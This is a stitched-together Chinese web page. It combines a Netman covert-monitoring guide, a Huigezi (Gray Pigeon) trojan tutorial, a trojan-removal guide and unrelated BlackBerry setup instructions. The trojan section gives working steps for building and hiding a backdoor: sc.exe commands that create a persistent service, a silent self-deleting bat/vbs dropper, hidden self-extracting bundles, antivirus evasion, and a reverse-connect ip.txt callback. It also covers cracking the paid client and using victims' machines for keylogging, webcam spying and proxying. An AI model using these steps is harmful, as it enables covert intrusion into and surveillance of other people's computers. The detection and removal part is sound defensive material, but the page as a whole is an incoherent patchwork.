最新灰鸽子远程控制软件教程

最新灰鸽子远程控制软件教程

（考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看）

第一部份：网络人远程监控软件

网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。

Netman监控版详细安装方法：

1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。

2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program

Files\Netman”，可以自己修改，但安装路径需要记住，因为启动软件桌面上不会新建快捷方式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。

3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。

5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。

出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

6.设置好密码密码后，点右上角的关闭按扭，软件就会在后台运行，桌面上看不到任何图标和提示。想要再次操作软件，请按下ctrl+y键。

右上角的关闭按扭只是将软件界面关闭，想要彻底退出软件，应点击左上角的“文件”-“退出”。很多用户想要卸载软件时，发现无卸载，就是因为没有退出程序造成。

7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录，在“远程IP/ID”处输入对方的会员ID和控制密码，点击“连接”即可连接远程电脑。

https://www.sodocs.net/doc/c94473211.html,man监控版“连接”按扭左侧有一个“中转”选项，是通过网络人的服务器中转

优化连接速度。通常不建议选择“中转”，因为连接速度正常时，选上反而会使得速度变慢。在没选择的情况下，软件会根据网络状况，自行判断是否通过服务器中转。软件还有许多设置选项，在不了解功能的情况下，不要随意修改。

第二部份：

灰鸽子教程

准备工具：

鸽子服务端

IcoSprite图标更改器；

SC.exe服务添加删除更改工具；

winrar

程序特点：

自解压形式，双击即可

制作过程：

1. 首先自己配置一下鸽子服务端，配置时[启动项设置]这里面的都不要填，不要写入注册表，也不要用服务启动。其他的随你个人爱好。

2.用SC创建一个服务

运行CMD.EXE 在system32的目录下运行执行

SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"

‘这句是用SC建立一个服务，服务名为huigezi，路径Binpath为"%systemroot%\system32\gezi.exe"，类型type为own 与interact交互，启动类型start为自动，显示名DisplayName为"gezi"。

sc.exe descript_ion huigezi "不死鸽子"

‘这句是将huigezi服务的描述改为“不死鸽子”

sc config wuauserv depend= huigezi

‘配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。

这里的目的是迷惑管理员，使其不敢轻易停止我们生成的服务，自己也可以多加点。

3.将这些从注册表导出，我个人经验是：瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg

4.创建一个BA T文件,并命名为update.bat

@regedit /s %systemroot%\system32\1.reg

@%systemroot%\system32\gezi.exe

@del /q /f /s %systemroot%\system32\1.reg

@del /q /f /s %systemroot%\system32\Update.vbs

@del /q /f /s %systemroot%\system32\Update.bat

5.创建一个vbs并命名为update.vbs

目的是为了作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。

里面写上如下代码：

On Error Resume Next

set wshshell=createobject ("wscript_.shell")

a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)

6.用我门配置出来的服务端，并命名为run.exe，用run.exe做一个自解压文件，并命名为gezi.exe.。

记得将解压模式为全部隐藏.解压后运行run.exe，当然你的服务端要自己做免杀，这里我就不多说了。八仙过海....

7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件，解压到%systemroot%\system32\ 解压后运行Update.vbs

当然解压模式依旧全部隐藏，替换同名文件

现在用rar捆绑出来的文件很多杀软都不杀，你也可以用系统自带的捆绑机，或其他的捆绑机

这个方法可以用到其他的木马中

捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"

灰鸽子第一章：软件相关介绍：

灰鸽子[VIP 专业版]

1.只用一个端口来传输所有通讯数据！普通同类软件都用到了两个或两个以上的端口来完成！

2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑！软件智能读取系统设定的代理服务器信息，无需用户设置！

3.无需知道服务端IP，自动上线功能让服务端自动上线报道！灰鸽子专用的上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式，在我们的专用上线系统出现故障时，您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时，你还可以控制远程电脑通过Socks5代理来中转自动上线。

4.自动上线可以在第一次设置分组，自定义上线图像，上线备注等，这样都可以让你轻而易举的找到目标主机，同时设置连接密码保证了服务主机的安全性！同时具用牵手版的搜索符合条件主机的功能：

a.从主机窗口筛选：可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏！

b.从主机进程筛选：可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了！

5.文件管理：管理远程电脑的文件系统,支持复制、粘贴、删除，断点下载、上传文件或文件夹，文件内容均以加密方式传输，确保通讯的安全性.

6.远程控制命令：包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制！

7.注册表编辑器：可以像操作本机注册表一样的编辑远程注册表。

8.常用命令广播，让你控制主机众多主机更多的方便！详细的在线主机线表显示了：主机IP地址，地址位置，电脑名称，系统版本,备注等信息,

9.除了具有语音监听、语音发送，还有远程视频监控功能，只有远程计算机有摄像头，且正常打开没有被占用，那么你可以看到,远程摄像头捕获的图片！还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能！无需第三方软件支持！支持Windows9x/ME/2000/Xp/2003。

11.软件附带有四款实用工具：

a. EXE工具: 可以修改任何EXE文件图标，支持真彩色！

b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上，使你在局域网内部也能使用自动上线功能！

c. FTP服务器: 可以开本机FTP服务！

d. Web服务器: 可以建立一个简单的Web服务器！

12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.

13.全中文友好操作界面，让你一目了然，漂亮皮肤让使用时也倍感亲切！

功能简单介绍：

【1】对远程计算机文件管理：模枋Windows 资源管理器，可以对文件进行复制、粘贴、删除，重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。

【2】远程控制命令：查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理！

【3】捕获屏幕：不但可以连继的捕获远程电脑屏幕，还能把本地的鼠标及键盘传动作送到远程实现实时控制功能！

【4】视频语音，可以监控远程摄像头,还有语音监听和发送功能，可以和远程主机进行语音对话！

【5】telnet(超级终端).

【6】注册表模拟器：远程注册表操作就像操作本地注册表一样方便!

【7】命令广播：可以对自动上线主机进行命令广播，如关机、重启、打开网页，

筛选符合条件的机等，点一个按钮就可以让N台机器同时关机或进行其它操作！

【8】服务端以服务方式启动，支持发送多种组合键，可以轻松管理远程服务器！

【9】专用的自动上线系统，直接使用灰鸽子注册ID即可实现远程服务端自动上线！

【10】多种自动上线方式：专用上线、DNS解析域名、固定IP等，用户自由选择！

注册灰鸽子软件后享有：

⒈享用软件的所有功能,没有任何限制!

⒉能使用对应的灰鸽子注册版本，能得到此版后期修正的正式版本!

⒊可以使用我们的专用上线系统，无需其它域名和空间支持!

⒋得到我们更好的技术服务!

注：[VIP版] 包括VIP2005、Version 1.2、Version 2.0 !

[企业版]用户只能使用企业版！不能使用其它版本！

5.加入会员后，会自动加入官方论坛。享受官方技术支持

灰鸽子第二章：好马配好鞍，服务端正确配置。

灰鸽子是一款要交钱的软件，也就是说，你使用VIP版的话是要交给作者每年几十块钱的使用费（不作任何评论）因此网上也就有很多高手破解灰鸽子，让灰鸽子可以不用到灰鸽子的官方网站进行验证，从而可以不用交钱就可以使用，相关版本有：影子鹰破解专用版，爱儿破解版，以及华夏黑客联盟的灰鸽子sunray破解版。

今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式，只可实验，不可做坏事，大家不喜欢请跳过这一章。

第一节：未雨绸缪，实验准备。

第一,关闭杀毒软件，这点不用我说了吧~~~因为是木马，下载了之后如果杀毒软件监控开着的话肯定会被删除的。

第二，当然是下载灰鸽子的软件啦~~~上网找，有很多~~~

第三，申请一个免费的主页空间，为什么要呢？因为灰鸽子是可以反弹式链接的，也就是说，服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。（这一点，等一下会详细解说）

第二节：实战开始。

把我们刚才下来的文件解压到某个文件夹，记住，不要改文件夹的名字，后面会用到。

解压的文件里面有以下几个文件：

H_Client.exe 这个是客户端的主要文件，可以配置文件，生成服务端，可以远程控制客户端。

http.exe 这个是本地http服务器，因为我们的灰鸽子是破解版的，通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版，所以这个软件就是用来在本机子上建一个服务器，骗过软件的，从而达到破解的目的。

sunray.exe 这个里面其实也就只是一个host，它把https://www.sodocs.net/doc/c94473211.html,这个网站的域名本地解析到本机，而不是解析到官方网站。vip_2005_0113.rar 这个是验证的软件，当我们的软件解析到本机的时候它就会

下载这一个到客户端，用来验证用的。

其它的文件还有config2005.asp，Operate.ini 还有四个文件夹，他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。

第一步：在你的电脑上新建一个ip.txt的文本文件，内容如下：http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址，8000是连接的端口，你可以把它写成你自己的IP地址，端口一般不要去改动，然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话，那你就要经常更新这个文件的内容，然后上传到空间，它的目的是客户端上线的话就会去这个网站读取这个文件，然后主动和你取得连接。

第二步，首先运行sunray.exe，然后运行http.exe 点开始服务！

第三步，运行客户端，也就是H_Client.exe这个文件，

点击“自动上线”选项，有几个要点要说的，

1）“备用自动上线，URL转向域名或网页文件，这里呢，填写你刚才申请到的网站空间地址和ip.txt，比如http://你的网站地址/ip.txt（当然，如果你是固定IP的话呢，可以写你的IP地址，那么前面的申请空间，上传文件几步可以省略）

2）“自动连接密码”，这个是表示你可以连接到的电脑所要用到的密码，如果为空的话，也没什么大不了的，顶多就是别人也可以用你的“肉鸡”

3）“配置说明”建议你把“只使用备用自动上线”前的勾打上，因为我们的软件是破解版的，官方的那个服务器我们是用不了啦~~~

4）“用户名称”“用户密码”这两个地方乱填些数字进去就行了，破解版用不了正式版的服务器的，它是服务器用来验证软件是否“正版”用的。

“安装选项”选项卡，建议修改一下名字，以免被发现，其它的自己看着办，看着喜欢就选吧~~~^_^

“启动项”这个很重要，建议你修改一下名字，它主要是服务端随系统自动启动用的，也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的，这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因，因为它写成了服务，这

个的优先级是系统级的，所有使用这台电

脑的用户都会启动木马。

“代理服务”，嘻嘻，就是你控制的电脑可以给我们做为一台代理服务器，说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~

“高级选项”这里主要是用来对付杀毒软件和防火墙用的，默认是插入IEXPLORER，启动隐藏文件隐藏插入的IE进程，以及使用UPX压缩，这里就不用去改它的，默认就行。

"服务器图标”是用来伪装用的，你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器，软件会优先从官方验证，但没效，出错了后就从本地服务器验证，这就是我们要本机建http服务器的原因。好了，到此，服务端就生成了，不要运行它，运行了你就会中木马的，（不准做坏事）

软件使用方法：当别人中了你的木马后，它会从你的网站读取ip.txt这个文件，然后主动连接到你的电脑，如果你此时也打开了客户端的话，连接建立成功，你可以控制这台电脑了。具体有什么内容你自己摸索，

如果你是动态IP地址的话，那么你要每次把新的ip.txt上传到网站上去~~~

·没有路由密码权限时的鸽08-23 ·上网安全Vista自我防范10-11

·让濒临崩溃的Windows XP 10-11 ·有备无患，快速自制救急10-11

·要你好看!Windows看图工10-11 ·空间赞助网提供不同类型10-11

·讨论net.exe和net1.exe的10-10 ·让3389远程桌面传输更通10-10

·巧妙入侵渗透赌博站10-10 ·Aspx空间扫权限工具10-10

·Windows2003最新提权工具10-10 ·易淘乐提供100M免费全能10-10

·系统开机密码忘了不着急10-09 ·中意网络提供免费100M免10-09

·与众不同Windows XP开始10-08 ·让桌面图标翻跟斗在XP上10-08

·上海宽元站长资助计划-提10-08 ·个性化Windows XP的任务10-07

·趣盘提供3G免费网络硬盘10-07 ·秀山热线提供200MB免费全10-07

·一次艰辛的提权过程10-06 ·成功入侵IT大卖场的渗透10-06

·mysqlhack- MYSQL利用工10-06 ·lanker一句话PHP后门客户10-06

·WIXI提供3G免费多媒体网10-06 ·新人网络提供100M/ftp免10-06

·如何利用QQ带来高流量10-05 ·UuShare提供免费网络文件10-05

[推荐]灰鸽子超级详细教程（看了就会）热荐★★★★★灰鸽子超级详细教程（看了就会）文章整理发布：黑客风云文章来源：https://www.sodocs.net/doc/c94473211.html, 更新时间：2007-1-16 13:12:53

灰鸽子第三章：服务端工作方式：

灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事

，灰鸽子就成了很强大的黑客工具。这就好比火药，用在不同的场合，给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚，在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型（如等待连接还是主动连接）、主动连接时使用的公网IP（域名）、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户（通过代理上网）、公网用户和ADSL拨号用户等。

下面介绍服务端：

配置出来的服务端文件文件名为G_Server.exe（这是默认的，当然也可以改。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项，甚至是进程中的模块名。截获的函数主要是用来遍历文件、

遍历注册表项和遍历进程模块的一些函数。所以，有些时候用户感觉种了毒，但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll 文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获，正常模式下难以遍历到灰鸽子的文件和模块，造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦，因此造成了近期灰鸽子在互联网上泛滥的局面。

灰鸽子第四章：双管齐下，手工和软件清除灰鸽子。

一.灰鸽子的手工检测

由于灰鸽子拦截了API调用，在正常模式下服务端程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子服务端。

由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者

在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。

2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows 的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。

3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll 的文件。

4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了，下面就可以进行手动清除。

二、灰鸽子的手工清除

经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

注意：为防止误操作，清除前一定要做好备份。

（一）、清除灰鸽子的服务

注意清除灰鸽子的服务一定要在注册表里完成，对注册表不熟悉的网友请找熟悉的人帮忙操作，清除灰鸽子的服务一定要先备份注册表，或者到纯DOS下将注册表文件更名，然

后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联2000／XP系统：

1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server，每个人这个服务项名称是不同的）。

3、删除整个Game_Server项。

98／me系统：

在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。

（二）、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子VIP 2005 服务端已经被清除干净。

以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种，然而仍有极少数变种采用此种方法无法检测和清除。同时，随着灰鸽子新版本的不断推出，作者可能会加入一些新的隐藏方法、防删除手段，手工检测和清除它的难度也会越来越大。

三、防止中灰鸽子病毒需要注意的事项

1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack)，其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用，是非常必要的补丁程序

2. 给系统管理员帐户设置足够复杂足够强壮的密码，最好能是10位以上，字母+数字+其它符号的组合；也可以禁用/删除一些不使用的帐户

3. 经常更新杀毒软件（病毒库），设置允许的可设置为每天定时自动更新。安装并合理

使用网络防火墙软件，网络防火墙在防病毒过程中也可以起到至关重要的作用，能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁，这点也比较无奈，这部分用户不妨通过使用网络防火墙来进行

一定防护

4. 关闭一些不需要的服务，条件允许的可关闭没有必要的共享，也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。这些都可以用winxp总管等优化软件关闭。

5. 不要随便打开或运行陌生、可疑文件和程序，如邮件中的奇怪附件，外挂程序等。

四、灰鸽子（Huigezi、Gpigeon）专用检测清除工具

软件名称：灰鸽子（Huigezi、Gpigeon）专用检测清除工具

界面语言：简体中文

软件类型：国产软件

运行环境：/Win9X/Me/WinNT/2000/XP/2003

授权方式：免费软件

软件大小：414KB

软件简介：由灰鸽子工作室开发的,针对灰鸽子专用清除器!可以清除VIP2005版灰鸽子服务端程序(包括杀毒软件杀不到的灰鸽子服务端)和灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端运行DelHgzvip2005Server.exe文件清除VIP2005版灰鸽子服务端程序，运行un_hgzserver.exe文件清除灰鸽子[辐射正式版] 和DLL版服务端牵手版服务端

结束语：写完了这篇教程，我也该准备重装系统了，因为我运行了自己生成的木马，体验到了它的强大功能，不想手工去清除了，直接重装算了。

灰鸽子原理及上线方法剖析

原创作者ｕｎｉｓ 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助，两者之间有很大的区别，所谓远程协助需要经过被控端的授权允许，并且被控端可以看到控制者的所有操作，使之控制操作透明性；例如我们的QQ远程协助，就需要对方的允许控制进行操作，并且对方也能够看到我们的操作动作，远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样，远程控制只要在被控者电脑安装一个服务端，即可在不知情的情况下进行控制对方计算机以及对计算机其它操作，控制时不需要经过对方的许可就可以控制，而控制时操作的一些动作，对方也无法察觉到（除鼠标控制）。远程控制按控制类型可以分类为：（1）正向主动型远程控制（2）反向被动型。什么是正向主动型的呢？正向主动型是需要控制着主动去连接被控端，一般情况下，控制者必须知道需要被控制者的IP和端口，然后通过某种软件来进行控制被控者，例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP（端口）然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术，指的是在被控端下安装服务端之后，由被控端主动来寻找你的客户端监听端口软件连接来进行控制，这个好处就是不需要知道对方的IP地址和端口，被控端会自己主动来找我们的监听地址和端口，当我们发现被控端已经找到我们的监听地址和端口，我们就可以控制对方电脑，这样省去要知道对方的IP和端口的麻烦了，特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了，黑客专门使用某些控制软件在控制对方，反弹型远控软件更是数不胜数，例如：花鸽子（灰鸽子）、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控，并且也有讲解到Web型的正向型远控，正向型远控还有Radmin、3389远程桌面也可以值得大家去学习，关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件（又称客户端，生成出的木马叫服务端）数不胜数，甚至很多已经是源码爆出，对于各种远程控制软件来说，其实基本都是具备以下功能： 【屏幕监控】：可以查看被控制者的屏幕，保存捕获的被控制屏幕的截图。并且看到对方的一切操作，可以自由选定图像位色查看，还 可以选择是否控制对方鼠标、键盘，若选择即可控制对方的电脑鼠标、键盘，这一控制对方是可以看到鼠标被控制。 【文件管理】：可以在后台查看被控者的各个磁盘中的文件，直接显示隐藏文件，可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程

新手必看 黑莓常见问题 装软件 刷机 说明书

注意：请勿装来电精灵之类的来电归 属地查询软件，可能导致您接不到电 话等通讯故障，实在要装请装最新版 本的！！ BB入学之黑莓的一般设置 前言：最近看到很多机友都转向了BB，拿到手后出现一些设置上的困惑，这里根据自己的使用将所知道一些常识性的设置列出来给大家做一个参考，希望大家互相鼓励，将BB的使用发挥及至。 一、短信发送乱码的设置 刚拿到BB可能都比较新奇，且对它爱不释手，但在发短信时发现显示都是？？？？？？？原因：USC2是UNICODE编码的一种，BB的操作系统支持多国语言，所以设计的时候只支持UNICODE。 设置步骤： 1、进入设置-----选项； 2、进入SMS； 3、滑动光标到数据编码，进入后选择UCS2。 二、拨打电话出现未开启服务等提示，但可以接电话 症状为，接电话正常，手工拨号基本也正常，但从地址薄拨打会提示错误，不可用 设置步骤： 1、移动光标进入“电话”（如果是列表的桌面按下拨打键）； 2、按回车进入,选择选项进入 3、移动光标到智能拨号，看见“国家地区代码”选项了吗？ 呵呵剩下的就不说了，当然选择+86 ，或者“未知”均可。 三．网络设置，解决QQ、浏览器等不能连接的问题。 1. 在主菜单中选择设置/选项，然后进入高级选项，选择TCP。将APN 设为：移动：cmnet或者cmwap，联通设为：uninet 或者uniwap，保存退出就可以了。 2.QQ常见问题：要改变QQ帐号或密码请用英文输入进入QQ。如果QQ 突然不能登陆，取下电池重新开机试下了，。 四、硬启或者叫格式化手机 清除机器里的所有信息资料，但程序不会删除。

1、进入设置---选项列表； 2、进入安全选项----一般设置； 3、光标移动到密码，按回车进入； 4、看见“搽除手持设备”了没，就是它咯。 五、情景模式转换 会议或者户外时，可调整到震动及屏幕亮度强弱 1、进入配置文件，选择所需的情景模式，：） 2、长按# 可以在设置的情景模式与震动间切换。 六、键盘锁的启动及快捷键设置 因是直板，我们可爱的BB当然也有键盘锁定的保护功能咯 1、长安*键就可以进入键盘锁定状态； 2、* + 拨号键解锁。 （BB也有中间的那个快捷键的专门设置，另在选项中） 七、从SIM卡导入电话薄 1、进入电话薄； 2、按入滑轮，选择SIM电话薄； 3、电话薄出来后，再按入滑轮，选择全部复制到地址薄。 八、电话功能、免提、暂停送话、音量调节 1、拨打电话就是绿色拨打键，自不用说了； 2、拨打过程中，71系列可以按OP键，切换免提功能； 3、按QW键可以暂停送话； 4、滑轮在拨打过程中可以调节音量。 九、在BB头上显示咱自己的号码 1、进入设置---选项； 2、高级选项----SIM进入； 3、按入滑轮选择编辑SIM卡号码； 4、编辑后，选择保存退出，重启BB。 OK了，看见自己的号码了吧。 十、短信爱好者必读------快捷方式大放送 短信收的多了，查看起来不是很方便，发现了几个快捷键和大家分享一下。 进入短信列表之后， 1键为返回第一页 2键是向上一条记录 3键为返回本页页首 4键为前一天的所有记录（如：我们正在查看今天的短信，按一下4就回到了昨天的记录上）5键为确定，和回车一样 6键和4键功能相反，为前进一天

给黑莓刷ROM的详细教程刷机有风险

给黑莓刷ROM 的详细教程(刷机有风险，有可能会把机器变成砖头；非必需请勿轻易尝试！！！) 特别注意 刷机，刷ROM，可以这么理解，黑莓和电脑一样可以装系统，可以升级系统；黑莓公司为世界上很多国家很多运营商提供定制生产。比如为国外生产的机器，通过刷中文ROM就可以满足我们这些使用汉字的人的需要了。 只有满足刷机条件才可以进行刷机操作，刷机的过程，桌面管理器会比较黑莓机器内部的系统软件和已经安装到电脑上的最高版本的兑应的ROM【可以存在多个型号和版本的ROM在你的电脑上】，如果电脑上安装的ROM版本低于黑莓中的系统版本会提示可能降级。 黑莓公司会根据用户的反应不断推出新版本的ROM版本。比如7290的中文常见ROM有4.1.0.292 4.1.0.351； 刷机不是必须的，强烈建议新手不要先刷机，等到自己熟练操作BB的常用功能，以及同步等后再刷不迟！ 还有特别注意，某些时候，桌面管理器可能提示已断开，不用理睬，尽管按照刷机步骤进行操作，尤其是WIPE后，BB内已经没有了操作系统自然无法联机，遇到特别问题时，刷机过程可以尝试拿掉电池，总之就是按部就班刷刷刷，如果连续刷100还是不行可能BB挂了 ～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～ 特别提醒，如果要刷机必须满足以下三个条件 1.桌面管理器【DM】下载并安装了

7100 8100等可以使用4.2的DM 其他7230 7290 等型号一样使用4.1的DM 2.对应的ROM 下载并安装了 特别注明：7230 7290 7730 8700等的ROM必须下载对应的，7100X 7100T 7100V 7100G 7105T等都是用一个ROM 7100的 下载站点链接（和论坛不公用必须重新注册然后下载） 香港3的快速下载页面 5820 handheld software version (3.6.0.94) (11.8 MB) 7100g handheld software version 4.1.0.351 Chinese version (44.8 MB) 7100g handheld software version 4.1.0.351 Multilanguage version (49.7 MB) 7130g handheld software version 4.1.0.351 Chinese version (46.1 MB) 7130g handheld software version 4.1.0.351 Multilanguage version (51.0 MB) 7230 handheld software version 4.0.2.351 (26.5 MB) 7290 handheld software version 4.1.0.351 (41.7 MB) 7290 handheld software version 4.1.0.351 (45.2 MB) 7730 handheld software version 4.0.2.351 (26.6 MB) 8700g handheld software version 4.1.0.377 Chinese version (44.6 MB) 8700g handheld software version 4.1.0.377 Multilanguage version (47.2 MB) 8707g handheld software version 4.1.0.351 (Bundle 528) Chinese version (48.6 MB) 8707g handheld software version 4.1.0.351 (Bundle 528) Multilanguage version (51.2 MB) 3.一定要进入下面的目录 C:\Program Files\Common Files\Research In Motion\AppLoader

黑莓刷机教程

